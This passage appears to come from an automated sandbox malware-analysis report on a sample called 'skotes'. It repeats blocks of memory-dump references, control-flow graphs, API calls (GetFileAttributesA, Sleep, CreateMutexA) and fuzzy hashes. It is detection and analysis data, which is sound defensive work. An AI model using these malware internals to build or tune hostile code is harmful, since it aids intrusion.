                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: 6d25b435feef74c788f9b7dd8286491e51eac0140fe8947bd9fbd1f13e007bed
                                                          • Instruction ID: 32f150f62507d466fd1fead333bb0caa6396e80675e730d4a06534996c2e6322
                                                          • Opcode Fuzzy Hash: 6d25b435feef74c788f9b7dd8286491e51eac0140fe8947bd9fbd1f13e007bed
                                                          • Instruction Fuzzy Hash: A3314A717102849BEB18DB79DCC976DB7EAEFC6310F204298E114A73D2D775A9848713

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1587 bea2e3-bea303 GetFileAttributesA 1590 bea305-bea311 1587->1590 1591 bea331-bea34d 1587->1591 1594 bea327-bea32e call bfd663 1590->1594 1595 bea313-bea321 1590->1595 1592 bea34f-bea35b 1591->1592 1593 bea37b-bea39a 1591->1593 1598 bea35d-bea36b 1592->1598 1599 bea371-bea378 call bfd663 1592->1599 1600 bea39c-bea3a8 1593->1600 1601 bea3c8-bea916 call bf80c0 1593->1601 1594->1591 1595->1594 1596 bea93a 1595->1596 1604 bea953-bea987 Sleep CreateMutexA 1596->1604 1605 bea93a call c16c6a 1596->1605 1598->1596 1598->1599 1599->1593 1607 bea3be-bea3c5 call bfd663 1600->1607 1608 bea3aa-bea3b8 1600->1608 1616 bea98e-bea994 1604->1616 1605->1604 1607->1601 1608->1596 1608->1607 1617 bea996-bea998 1616->1617 1618 bea9a7-bea9a8 1616->1618 1617->1618 1619 bea99a-bea9a5 1617->1619 1619->1618 1621 bea9a9-bea9b0 call c16629 1619->1621
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA2E6
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: c3eadf62c03d30c9ddcee24837d4fb7c872c061a397b0549922329e79e7f2bd5
                                                          • Instruction ID: 5f066d08b12c58de7d5f64e8cf0d398773e0f35c831c18bd1c88f89ae624a7d7
                                                          • Opcode Fuzzy Hash: c3eadf62c03d30c9ddcee24837d4fb7c872c061a397b0549922329e79e7f2bd5
                                                          • Instruction Fuzzy Hash: 68316A717102849BEB18DB79DCC876DB7FAEFC6310F208298E014AB7D6C775A9848716

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1624 bea418-bea438 GetFileAttributesA 1627 bea43a-bea446 1624->1627 1628 bea466-bea482 1624->1628 1629 bea45c-bea463 call bfd663 1627->1629 1630 bea448-bea456 1627->1630 1631 bea484-bea490 1628->1631 1632 bea4b0-bea4cf 1628->1632 1629->1628 1630->1629 1633 bea93f-bea94e call c16c6a * 3 1630->1633 1635 bea4a6-bea4ad call bfd663 1631->1635 1636 bea492-bea4a0 1631->1636 1637 bea4fd-bea916 call bf80c0 1632->1637 1638 bea4d1-bea4dd 1632->1638 1656 bea953-bea987 Sleep CreateMutexA 1633->1656 1657 bea94e call c16c6a 1633->1657 1635->1632 1636->1633 1636->1635 1643 bea4df-bea4ed 1638->1643 1644 bea4f3-bea4fa call bfd663 1638->1644 1643->1633 1643->1644 1644->1637 1659 bea98e-bea994 1656->1659 1657->1656 1660 bea996-bea998 1659->1660 1661 bea9a7-bea9a8 1659->1661 1660->1661 1662 bea99a-bea9a5 1660->1662 1662->1661 1664 bea9a9-bea9b0 call c16629 1662->1664
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA41B
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: 8c658ed2615dc307b92748b1d9f60f6570a45923d23825c45d102c0f1049ddc7
                                                          • Instruction ID: a028a6b9d8726b318ac079cc72f73d7ba378575658e3ff5e8f460169aa19792e
                                                          • Opcode Fuzzy Hash: 8c658ed2615dc307b92748b1d9f60f6570a45923d23825c45d102c0f1049ddc7
                                                          • Instruction Fuzzy Hash: 153159317001849BEB18EB79D8CDB6DB7FAEFC2310F204298E0149B3C6D7B569848752
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA550
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: e9933351f5afe4f24ac8f8008c6a5b367e5c2d6206084772a060a0c35b431598
                                                          • Instruction ID: de6a704a8c39ecb45905020e25845e10db435e85ae865ab63201ff7fbf34c392
                                                          • Opcode Fuzzy Hash: e9933351f5afe4f24ac8f8008c6a5b367e5c2d6206084772a060a0c35b431598
                                                          • Instruction Fuzzy Hash: 9D317B317101849BEB18DB79CCC9B6DB7EAEFC6314F248298E014DB3D2C775A9848712
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA685
                                                          • Sleep.KERNELBASE(00000064,?), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesCreateFileMutexSleep
                                                          • String ID:
                                                          • API String ID: 396266464-0
                                                          • Opcode ID: fa88eb73975ab1dea56f842beca1569efb7c8bd32c4566a1ba71c7776ad09af2
                                                          • Instruction ID: 1f5d7cf5f4891cf68450d41cac514abea9ef71f5eb3e92dac8c08fa3e37dcc8c
                                                          • Opcode Fuzzy Hash: fa88eb73975ab1dea56f842beca1569efb7c8bd32c4566a1ba71c7776ad09af2
                                                          • Instruction Fuzzy Hash: F6314A717102849BEB18DB79DCC976DB7EAEFC6310F248298E014DB3D2C775A9848752
                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000), ref: 00BEA7BA
